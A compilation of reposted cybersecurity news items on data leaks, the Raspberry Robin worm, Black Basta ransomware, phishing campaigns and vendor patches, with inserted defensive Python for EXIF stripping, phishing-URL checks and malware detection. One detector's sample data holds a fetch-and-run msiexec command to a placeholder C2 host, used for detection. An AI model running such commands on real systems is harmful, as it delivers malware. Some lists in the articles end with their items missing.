The Safety Detectives cybersecurity team discovered 150 GB of exposed data in the bucket with over 50,000 user avatars. Two separate databases contained different types of information, including user avatars (profile pictures on the website) and post images.

“While this is publicly available information, user avatars could be used in conjunction with EXIF data to identify vulnerable users,” the report explains.

Post images, in turn, were uploaded by users separately to the charity’s website. The researchers detected over 300,000 such files and EXIF data attached to each post image. Such data can expose additional details about the user, including the image’s GPS location and information about the device which took the image. No contact details of website users seem to be affected.
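The EXIF risk described above is easy to remove at upload time: a JPEG's Exif metadata (GPS coordinates, camera make and model, timestamps) lives in an APP1 marker segment that can be dropped without touching the image data. The following pure-stdlib Python is an added example written for this digest, not code from Safety Detectives or the charity; the sample JPEG is a constructed byte skeleton that is structurally valid but not a decodable picture, and the Exif payload is a stub standing in for real tags.

```python
import struct

# JPEG marker bytes (the byte following the 0xFF prefix)
SOI, EOI, SOS, APP1 = 0xD8, 0xD9, 0xDA, 0xE1
EXIF_HEADER = b"Exif\x00\x00"   # payload prefix that identifies an Exif APP1 segment


def iter_segments(jpeg: bytes):
    """Yield (marker, start, end) byte ranges for every marker segment.

    Header segments are walked one by one; once Start Of Scan (SOS) or End Of
    Image (EOI) is reached the remainder is yielded as one range, because the
    entropy-coded scan data is not segment-structured.
    """
    pos = 2  # skip the SOI marker
    while pos + 1 < len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError(f"expected marker prefix 0xFF at offset {pos}")
        marker = jpeg[pos + 1]
        if marker == 0xFF:                      # fill byte allowed before a marker
            pos += 1
            continue
        if marker in (SOS, EOI):
            yield marker, pos, len(jpeg)
            return
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:   # stand-alone markers, no length
            yield marker, pos, pos + 2
            pos += 2
            continue
        if pos + 4 > len(jpeg):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        end = pos + 2 + length                  # length includes its own two bytes
        if length < 2 or end > len(jpeg):
            raise ValueError(f"bad segment length at offset {pos}")
        yield marker, pos, end
        pos = end


def _is_exif_segment(jpeg: bytes, marker: int, start: int) -> bool:
    return marker == APP1 and jpeg[start + 4:start + 10] == EXIF_HEADER


def has_exif(jpeg: bytes) -> bool:
    return any(_is_exif_segment(jpeg, m, s) for m, s, _ in iter_segments(jpeg))


def strip_exif(jpeg: bytes) -> bytes:
    """Return a copy of the JPEG with every Exif APP1 segment removed.
    Only Exif is dropped here; an XMP APP1 block could carry location data too."""
    if jpeg[:2] != bytes([0xFF, SOI]):
        raise ValueError("not a JPEG: missing SOI marker")
    out = bytearray(jpeg[:2])
    for marker, start, end in iter_segments(jpeg):
        if _is_exif_segment(jpeg, marker, start):
            continue                            # drop GPS, device model, timestamps, ...
        out += jpeg[start:end]
    return bytes(out)


def _segment(marker: int, payload: bytes) -> bytes:
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed sample: a structurally valid JPEG skeleton (not a decodable picture)
# whose APP1 segment carries a stub Exif/TIFF header in place of real tags.
SAMPLE_EXIF_PAYLOAD = EXIF_HEADER + b"MM\x00\x2a\x00\x00\x00\x08\x00\x00"
SAMPLE_JPEG = (
    bytes([0xFF, SOI])
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")   # APP0, kept
    + _segment(APP1, SAMPLE_EXIF_PAYLOAD)                               # Exif, dropped
    + _segment(0xDB, b"\x00" + bytes(64))                               # quantisation table
    + bytes([0xFF, SOS]) + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x12\x34"                                                       # stub scan data
    + bytes([0xFF, EOI])
)

if __name__ == "__main__":
    cleaned = strip_exif(SAMPLE_JPEG)
    print(f"before: exif={has_exif(SAMPLE_JPEG)} size={len(SAMPLE_JPEG)}")
    print(f"after:  exif={has_exif(cleaned)} size={len(cleaned)}")
```

Running the stripper on every avatar and post image before it is written to the bucket removes the GPS and device details the report warns about; the walker raises on malformed input rather than guessing, so a rejected upload is the safe failure mode.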

Both private and public images were exposed in the bucket. “Private” files included sensitive user images intended for medical screening, as well as test results. At the time when the bucket was discovered, it was still constantly being updated with new data, likely affecting users globally.

While the website has 200,000 registered users, it is likely that not all of them were affected by the incident. The minimum number of exposed users, however, stands at 50,000, accounting for the avatars discovered in the bucket.

“The number of exposed people could be higher, however, considering that users could be exposed in post images even if their user avatar is not included on the bucket,” the report suggests.

The bucket was discovered on November 11th, 2021, and considering its contents, it was still in use at the time.

“It contained files dating back to April 2017, though, filenames suggest some of these images date back to 2014 and were migrated to the bucket in 2017. We saw recent files on the bucket, too, dated mid-November 2021,” the report explains.

The researchers note that while the bucket was an Amazon S3 bucket, the provider was not responsible for the misconfiguration.

Following the exposure, users could suffer from harassment, phishing campaigns, or targeted attacks. In turn, the charity might face legal charges upon an investigation by the Federal Trade Commission (FTC).

Original Posts: A US charity leaves private images of website users exposed

Red Canary intelligence analysts have discovered a new Windows malware with worm capabilities that spreads using external USB drives.

This malware is linked to a cluster of malicious activity dubbed Raspberry Robin and was first observed in September 2021.

Red Canary’s Detection Engineering team detected the worm in multiple customers’ networks, some in the technology and manufacturing sectors.

Raspberry Robin spreads to new Windows systems when an infected USB drive containing a malicious .LNK file is connected.

Once attached, the worm spawns a new process using cmd.exe to launch a malicious file stored on the infected drive.

Windows legitimate tools abused to install malware

It uses Microsoft Standard Installer (msiexec.exe) to reach out to its command-and-control (C2) servers, likely hosted on compromised QNAP devices and using TOR exit nodes as additional C2 infrastructure.

“While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware,” the researchers said.

“Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”

While they haven’t yet found if it establishes persistence and through which methods, they suspect that the malware installs a malicious DLL file on compromised machines to resist removal between restarts.

Raspberry Robin launches this DLL with the help of two other legitimate Windows utilities: fodhelper (a trusted binary for managing features in Windows settings) and odbcconf (a tool for configuring ODBC drivers).

The first allows it to bypass User Account Control (UAC), while the second will help execute and configure the DLL.
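The behaviours listed above (cmd.exe launched from the USB drive, msiexec.exe reaching out to a remote domain, odbcconf.exe handling a DLL, and a process spawned under fodhelper.exe) each leave a footprint in process-creation telemetry. The Python below is an added detection sketch for this digest, not Red Canary's detection logic; the `ProcEvent` schema, the sample command lines and the `c2.example` hostname are all constructed, and the "non-C: drive means removable" rule is a stated heuristic rather than a reliable check.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (constructed; field names are an assumption,
    not any real EDR schema)."""
    image: str      # full path of the process that started
    parent: str     # full path of its parent process
    cmdline: str    # command line of the new process


URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Heuristic (assumption): a path on any drive letter other than C: is treated as
# a possible removable drive. Real telemetry should use the volume's bus type.
NON_C_DRIVE_RE = re.compile(r"\b[D-Zd-z]:\\")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every Raspberry Robin-style behaviour the event matches."""
    name, parent = _basename(ev.image), _basename(ev.parent)
    hits = []
    # msiexec.exe fetching a package from a URL instead of a local .msi
    if name == "msiexec.exe" and URL_RE.search(ev.cmdline):
        hits.append("msiexec_remote_package")
    # cmd.exe started from the shell to run something on a non-system drive
    if name == "cmd.exe" and parent == "explorer.exe" and NON_C_DRIVE_RE.search(ev.cmdline):
        hits.append("cmd_from_removable_drive")
    # odbcconf.exe asked to handle a DLL
    if name == "odbcconf.exe" and ".dll" in ev.cmdline.lower():
        hits.append("odbcconf_dll")
    # any child of fodhelper.exe is worth review (the report ties it to UAC bypass)
    if parent == "fodhelper.exe":
        hits.append("fodhelper_child_process")
    return hits


def suspicious_events(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> matched behaviours, for events with at least one match."""
    return {i: hits for i, ev in enumerate(events) if (hits := classify(ev))}


# Constructed sample telemetry; paths and the hostname are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe",
              r'msiexec.exe /i "C:\Users\alice\Downloads\tool.msi" /qn'),      # benign install
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              r'cmd.exe /r "E:\sys.bat"'),                                      # run from USB
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\cmd.exe",
              r"msiexec.exe /q /i https://c2.example/update.msi"),             # network fetch
    ProcEvent(r"C:\Windows\System32\odbcconf.exe", r"C:\Windows\System32\cmd.exe",
              r"odbcconf.exe C:\ProgramData\update.dll"),                      # DLL via odbcconf
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\fodhelper.exe",
              r"cmd.exe /c C:\ProgramData\run.bat"),                           # child of fodhelper
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              r"cmd.exe /c dir C:\temp"),                                      # benign shell use
]

if __name__ == "__main__":
    for idx, hits in suspicious_events(SAMPLE_EVENTS).items():
        print(idx, hits)
```

Each rule fires on its own, so a single msiexec download from a legitimate vendor will show up too; in practice the value comes from seeing several of these on one host in a short window, which is the correlation a SIEM query would add on top.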

How and why?

While the Red Canary analysts have been able to closely inspect what the newly discovered malware does on infected systems, there are still several questions that need to be answered.

“First and foremost, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, though it’s likely this occurs offline or otherwise outside of our visibility. We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said.

“One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis.”

Since there is no info on this malware’s end-stage malicious tasks, another question that needs an answer is what is the Raspberry Robin operators’ goal.

Further technical information on the Raspberry Robin worm, including indicators of compromise (IOCs) and an ATT&CK technique mapping for this malware, can be found in Red Canary’s report.

Original Posts: New Raspberry Robin worm uses Windows Installer to drop malware

Microsoft says that its enterprise-grade endpoint security for small to medium-sized businesses is now generally available as a standalone solution.

Known as Microsoft Defender for Business, this product is designed for SMBs with up to 300 employees who need protection against malware, phishing, and ransomware attacks on Windows, macOS, iOS, and Android devices.

“Microsoft believes in security for all. We are proud to further deliver on that vision today,” said Vasu Jakkal, CVP, security, compliance and identity at Microsoft.

“With the GA of Defender for Business, SMBs will get greater protection with simplified security to help them better protect, detect and respond to threats.”

Microsoft Defender for Business has started rolling out to Microsoft 365 Business Premium customers worldwide beginning March 1st.

Now customers can also get Defender for Business as a standalone license straight from Microsoft and Microsoft Partner Cloud Solution Provider (CSP) channels.

Defender for Business features a wizard-driven setup that makes it easier to configure clients. It will also enable all recommended security policies for organizations without a dedicated security team.

Key features bundled with this SMB-focused endpoint security suite include:

Microsoft said that it’s also planning to add support for servers later this year with the help of an add-on solution.

In November, Microsoft announced this new security solution at Microsoft Ignite 2021 after a 300% increase in ransomware attacks during 2020.

Original Posts: Microsoft Defender for Business stand-alone now generally available

Phishing emails increasingly target verified Twitter accounts with emails designed to steal their account credentials, as shown by numerous ongoing campaigns conducted by threat actors.

Verified accounts on Twitter are designated by a blue check next to their name, which indicates account holders are notable influencers, celebrities, politicians, journalists, activists, and government and private organizations.

To receive this ‘blue badge,’ Twitter users must apply for verification, which entails submitting additional information, including ID cards, website references, and other reasons that make your account ‘notable.’

These accounts typically have many followers or are considered “authoritative” in some circles and thus are highly sought after by threat actors to promote scam campaigns and malicious activity.

At the same time, as it’s not easy to gain a blue badge, emails warning that Twitter will take it away tend to cause people to react quickly without properly analyzing the message for signs of suspicious behavior.

Targeting verified Twitter users

These emails say that there is a problem with the recipient’s verified account and that they should click on the ‘Check notifications’ button to learn more about what’s wrong.

The phishing emails warn that ignoring this message could lead to the account’s suspension.

Clicking on the ‘Check notifications’ button brings the recipient to a page prompting them to enter their login credentials. Additionally, the page will prompt users to enter their credentials twice, which the threat actors use to verify that incorrect information wasn’t entered by mistake.

After entering the credentials, the phishing kit will perform a password reset on your account using the inputted email address. The phishing page will prompt targets to enter a login verification code, which the threat actors will use to finish the password reset process.

While the phishing pages clearly do not belong to Twitter, mistakes happen in our often hectic lives, and victims commonly submit their credentials by accident.

As always, when receiving emails that lead to login forms, make sure to examine the URL of the landing page and make sure it corresponds to the company that allegedly sent you the email.

If there is any doubt, junk the email and contact the company directly to verify if the email was a scam.
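The "examine the URL of the landing page" advice above has a few concrete checks behind it: the host must actually belong to the company's domain (not merely contain its name), the URL must not smuggle a decoy host in front of an `@`, the page should be served over https, and punycode hosts deserve suspicion. The Python below is an added example for this digest, not BleepingComputer's code; the sample URLs are constructed, the `*.example` hosts are reserved placeholders, and the two-label "registrable domain" rule is a simplification that ignores the public suffix list.

```python
from urllib.parse import urlsplit


def registrable_domain(host: str) -> str:
    """Last two DNS labels of a host. Simplification (assumption): no public
    suffix list, so 'example.co.uk'-style domains would need extra handling."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def check_login_url(url: str, expected_domain: str) -> tuple[bool, list[str]]:
    """Decide whether a login-page URL belongs to the organisation that
    supposedly sent the email. Returns (ok, reasons_it_is_not_ok)."""
    parts = urlsplit(url)
    host = parts.hostname or ""          # urlsplit already discards user-info and port
    reasons = []
    if parts.scheme.lower() != "https":
        reasons.append("login form is not served over https")
    if "@" in parts.netloc:
        reasons.append("URL carries user-info before '@', which hides the real host")
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("host uses punycode, a common look-alike trick")
    if registrable_domain(host) != expected_domain.lower():
        reasons.append(f"host {host!r} is not under {expected_domain}")
    return (not reasons, reasons)


# Constructed URLs; *.example hosts are RFC 2606 reserved placeholders.
SAMPLE_URLS = [
    "https://twitter.com/login",                          # genuine domain
    "https://twitter.com.verify-badge.example/login",     # brand name as a subdomain
    "https://twitter.com@verify-badge.example/login",     # decoy host before '@'
    "http://twitter.com/login",                           # right domain, no TLS
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        ok, why = check_login_url(u, "twitter.com")
        print("OK " if ok else "BAD", u, "; ".join(why))
```

The second sample is the pattern the article's campaign relies on: a hostname that starts with `twitter.com` but is registered under someone else's domain, which only a right-to-left reading of the host catches.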

Original Posts: New phishing warns: Your verified Twitter account may be at risk

Synology has warned customers that some of its network-attached storage (NAS) appliances are exposed to attacks exploiting multiple critical Netatalk vulnerabilities.

“Multiple vulnerabilities allow remote attackers to obtain sensitive information and possibly execute arbitrary code via a susceptible version of Synology DiskStation Manager (DSM) and Synology Router Manager (SRM),” Synology said.

Netatalk is an AFP (short for Apple Filing Protocol) open-source implementation that allows systems running *NIX/*BSD to act as AppleShare file servers (AFP) for macOS clients (i.e., to access files stored on Synology NAS devices).

The Netatalk development team addressed the security bugs in version 3.1.1, released on March 22, three months after the Pwn2Own 2021 hacking competition, where they were first disclosed and exploited.

QNAP also working on Netatalk patches

QNAP said the Netatalk vulnerabilities impact multiple QTS and QuTS hero operating system versions and QuTScloud, the company’s cloud-optimized NAS operating system.

Like Synology, QNAP has already released patches for one of the affected OS versions, with fixes already available for appliances running QTS 4.5.4.2012 build 20220419 and later.

“QNAP is thoroughly investigating the case. We will release security updates for all affected QNAP operating system versions and provide further information as soon as possible,” the NAS maker said.

“We recommend users to check back and install security updates as soon as they become available.”

Original Post: Synology warns of critical Netatalk bugs in multiple products

A new ransomware gang known as Black Basta has quickly catapulted into operation this month, breaching at least twelve companies in just a few weeks.

The first known Black Basta attacks occurred in the second week of April, as the operation quickly began attacking companies worldwide.

While ransom demands likely vary between victims, one victim received a demand of over $2 million from the Black Basta gang to decrypt files and not leak data.

Not much else is known about the new ransomware gang as they have not begun marketing their operation or recruiting affiliates on hacking forums.

However, due to their ability to quickly amass new victims and the style of their negotiations, this is likely not a new operation but rather a rebrand of a previous top-tier ransomware gang that brought along their affiliates.

Steals data before encrypting

Like other enterprise-targeting ransomware operations, Black Basta will steal corporate data and documents before encrypting a company’s devices.

This stolen data is then used in double-extortion attacks, where the threat actors demand a ransom to receive a decryptor and prevent the publishing of the victim’s stolen data.

The data extortion part of these attacks is conducted on the ‘Black Basta Blog’ or ‘Basta News’ Tor site, which contains a list of all victims who have not paid a ransom. Black Basta will slowly leak data for each victim to try and pressure them into paying a ransom.

When executed, the Black Basta encryptor needs to be run with administrative privileges, or it will not encrypt files. Once launched, the encryptor will delete Volume Shadow Copies.

It will then hijack an existing Windows service and use it to launch the ransomware encryptor executable. In our tests, the Windows service that was hijacked was the ‘Fax’ service.

The ransomware will also change the wallpaper to display a message stating, “Your network is encrypted by the Black Basta group. Instructions in the file readme.txt.”

The ransomware will now reboot the computer into Safe Mode with Networking, where the hijacked Windows service will start and automatically begin to encrypt the files on the device.

While encrypting files, the ransomware will append the .basta extension to the encrypted file’s name. So, for example, test.jpg would be encrypted and renamed to test.jpg.basta.
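The sequence just described (the Fax service's binary path being replaced, a burst of files renamed to `.basta`, and a `readme.txt` note dropped beside them) is what a file-system and service-change monitor can key on. The Python below is an added example for this digest, not BleepingComputer's or any vendor's detection code; the event schema, timestamps, share path and the `enc.exe` path are all constructed placeholders, and the burst threshold of 10 renames in 60 seconds is an arbitrary tuning choice.

```python
from collections import deque


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def _dirname(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[0]


def _basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def detect_basta_activity(events, threshold=10, window_s=60):
    """Scan time-ordered events and return (alert_name, ts, detail) tuples.

    Each event is a dict with 'ts' (seconds) and 'type'; remaining keys depend
    on the type. This schema is constructed for the example, not a product format.
    """
    alerts = []
    recent = deque()        # timestamps of .basta renames inside the sliding window
    hit_dirs = set()        # directories where encrypted files have appeared
    mass_fired = False
    for ev in events:
        kind = ev["type"]
        if kind == "rename" and _norm(ev["new_path"]).endswith(".basta"):
            recent.append(ev["ts"])
            while recent and ev["ts"] - recent[0] > window_s:
                recent.popleft()
            hit_dirs.add(_dirname(ev["new_path"]))
            if len(recent) >= threshold and not mass_fired:   # fire once per burst
                alerts.append(("mass_basta_rename", ev["ts"], len(recent)))
                mass_fired = True
        elif (kind == "create" and _basename(ev["path"]) == "readme.txt"
              and _dirname(ev["path"]) in hit_dirs):
            alerts.append(("ransom_note_beside_encrypted_files", ev["ts"], ev["path"]))
        elif (kind == "service_config" and ev["service"].lower() == "fax"
              and ev["field"].lower() == "imagepath"):
            alerts.append(("fax_service_image_changed", ev["ts"], ev["new_value"]))
    return alerts


# Constructed sample timeline: service hijack, then a burst of renames, then the note.
SHARE = r"C:\Shares\Finance"
SAMPLE_EVENTS = [
    {"ts": 90, "type": "service_config", "service": "Fax", "field": "ImagePath",
     "new_value": r"C:\ProgramData\enc.exe"},                        # placeholder path
] + [
    {"ts": 100 + i, "type": "rename",
     "old_path": rf"{SHARE}\report{i}.xlsx", "new_path": rf"{SHARE}\report{i}.xlsx.basta"}
    for i in range(12)
] + [
    {"ts": 112, "type": "create", "path": rf"{SHARE}\readme.txt"},
    {"ts": 113, "type": "rename", "old_path": r"C:\Users\bob\notes.txt",
     "new_path": r"C:\Users\bob\notes.md"},                          # benign rename
]

if __name__ == "__main__":
    for alert in detect_basta_activity(SAMPLE_EVENTS):
        print(alert)
```

The service-change alert is the one worth paging on: it lands before the reboot into Safe Mode with Networking and before any file is touched, whereas the rename burst confirms encryption is already under way.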

The Tor negotiation site is titled ‘Chat Black Basta’ and only includes a login screen and a web chat that can be used to negotiate with the threat actors.

The threat actors use this screen to issue a welcome message that contains a ransom demand, a threat that data will be leaked if payment is not made in seven days, and the promise of a security report after a ransom is paid.

Unfortunately, Gillespie says that the encryption algorithm is secure and that there is no way to recover files for free.

Original Post: New Black Basta ransomware springs into action with a dozen breaches

Microsoft has released the optional KB5011831 Preview cumulative update for Windows 10 20H2, Windows 10 21H1, and Windows 10 21H2 that fixes 26 bugs.

This update includes many bug fixes, including those for Microsoft OneDrive, Remote Desktop, News and Interest, Azure Active Directory, and delays in booting Windows 10.

The KB5011831 cumulative update preview is part of Microsoft’s April 2022 monthly “C” update, allowing admins to test upcoming fixes to be released during the May 2022 Patch Tuesday updates.

Unlike Patch Tuesday updates, the “C” preview updates are optional and do not include any security updates. However, if you run a Windows Insider build, the preview update will be installed automatically.

Windows users can install this update by going into Settings, clicking on Windows Update, and manually performing a ‘Check for Updates.’

What’s new in Windows 10 KB5011831

The Windows 10 KB5011831 cumulative update preview includes twenty-six improvements or fixes, with the six highlighted fixes listed below:

A complete list of the twenty-six fixes found in this preview update can be found in the KB5011831 support bulletin.

Original Post: Windows 10 KB5011831 update released with 26 bug fixes, improvements

Security analysts have found that Android devices running on Qualcomm and MediaTek chipsets were vulnerable to remote code execution due to a flaw in the implementation of the Apple Lossless Audio Codec (ALAC).

ALAC is an audio coding format for lossless audio compression that Apple open-sourced in 2011. Since then, the company has been releasing updates to the format, including security fixes, but not every third-party vendor using the codec applies these fixes.

This vulnerability enables a remote attacker to execute code on a target device by sending a maliciously crafted audio file and tricking the user into opening it. The researchers are calling this attack “ALHACK.”

The impact of remote code execution attacks comes with severe implications, ranging from data breaches, planting and executing malware, modifying device settings, and accessing hardware components such as the microphone and camera, to account takeover.

The case with audio codec flaws

Fixes of remote code execution flaws in closed-source audio processing units are present almost in every monthly Android security update.

However, exploiting them is rarely trivial, and the component vendors provide few technical details to reduce exploitation risk.

For example, Android patches from April included nine fixes for critical vulnerabilities in closed-source components. One of them is CVE-2021-35104 (9.8 severity score) – a buffer overflow that led to improper parsing of headers while playing FLAC audio clips.

The bug affected chipsets present in almost the entire range of products Qualcomm has released in the past several years.

How to stay safe

The standard security advice applies here, too: keep your devices up to date; in this case, that means running the Android patch level “December 2021” or later.

If the device no longer receives security updates from the vendor, installing a third-party Android distribution that still provides Android patches is a valid option.

Finally, when receiving audio files from unknown or suspicious sources/users, it is best not to open them since they could trigger the vulnerability.

Original Post: Critical bug in Android could allow access to users’ media files

An archive containing data purportedly scraped from 500 million LinkedIn profiles has been put for sale on a popular hacker forum, with another 2 million records leaked as a proof-of-concept sample by the post author.

The four leaked files contain information about the LinkedIn users whose data has been allegedly scraped by the threat actor, including their full names, email addresses, phone numbers, workplace information, and more.

While users on the hacker forum can view the leaked samples for about $2 worth of forum credits, the threat actor appears to be auctioning the much-larger 500 million user database for at least a 4-digit sum, presumably in bitcoin.

A statement from LinkedIn appears to confirm the latter: the company states that the data for sale was not acquired as a result of a data breach, and “is actually an aggregation of data from a number of websites and companies.”

LinkedIn facing a probe from Italy’s privacy watchdog

Following “the dissemination of user data, including IDs, full names, email addresses, telephone numbers” by the threat actor, Italy’s privacy watchdog began an investigation into the incident on Thursday.

The Italian authority said that the country has one of the highest LinkedIn subscriber counts among European states and called on affected users to “pay particular attention to any anomalies” related to their phone number and their account.

A new collection with 327M more LinkedIn profiles appears on hacker forum

It seems that other threat actors are looking to piggyback on the leak. On Friday, a new collection of LinkedIn databases has been put for sale on the same hacker forum by another user – for $7,000 worth of bitcoin.

The new author claims to be in possession of both the original 500-million database, as well as six additional archives that allegedly include 327 million scraped LinkedIn profiles:

If true, this would put the overall number of scraped profiles at 827 million, exceeding LinkedIn’s actual user base of 740+ million by more than 10%. This means that some, if not most, of the new data sold by the threat actor might be either duplicate or outdated.

What was leaked?

Based on the samples we saw from the leaked files, they appear to contain a variety of mostly professional information from LinkedIn profiles, including:

What’s the impact of the leak?

The data from the leaked files can be used by threat actors against LinkedIn users in multiple ways by:

Next steps

If you suspect that your LinkedIn profile data might have been scraped by threat actors, we recommend you:

Also, watch out for potential phishing emails and text messages. Again, don’t click on anything suspicious or respond to anyone you don’t know.

Original Post: LinkedIn Data Breach – 500M Records Leaked and Being Sold

Apple users are being warned by cryptocurrency wallet MetaMask over some security vulnerabilities involving iCloud backups.

The warning is said to be against potential phishing attacks for all iPhone, iPad, and Mac users. It involves certain default device settings which store MetaMask users’ seed phrase onto iCloud, whenever anyone enables automatic backups for app data. The seed phrase is also called a “password-encrypted MetaMask vault.”

The MetaMask vault being stored in Apple users’ iCloud credentials can lead to “stolen funds,” which is why they taught people how to disable their iCloud backups to avoid phishing attacks. If you’re a MetaMask user, here’s what you need to do:

How Did The Phishing Attack Go?

The MetaMask user, who posted that he’s giving a 100k reward to anyone who gets (or helps get) his digital assets back, also tweeted how everything went down.

According to him, he got a phone call from Apple on his caller ID which looked quite legitimate. Suspecting a scam, he called the aforementioned Apple number back and somebody answered, asking for a code that was sent to his phone. It is assumed that he told them the code, and his entire MetaMask was wiped “2 seconds later.” It is safe to assume that the caller who answered sounded real enough, which fooled the user in spades.

It is very likely that the malicious code sent to his phone in the guise of something like an OTP (one-time password) was the one that led to his assets being stolen. That is one of the hallmarks of phishing: tricking you into doing something you never intended.

In total, the user lost 132.86 ETH from his wallet (over $400k at the time of the theft) and 252,400 USDT for a total loss of $655,388.

In the aftermath of the theft and the discovery of the security flaw, many MetaMask users have emphasized the importance of using cold storage for all your digital assets. Aside from that, they also preached that people be extra careful when storing what they own inside a hot wallet.

Original Post: Apple Users Warned By MetaMask Over Potential Phishing Attacks Via iCloud
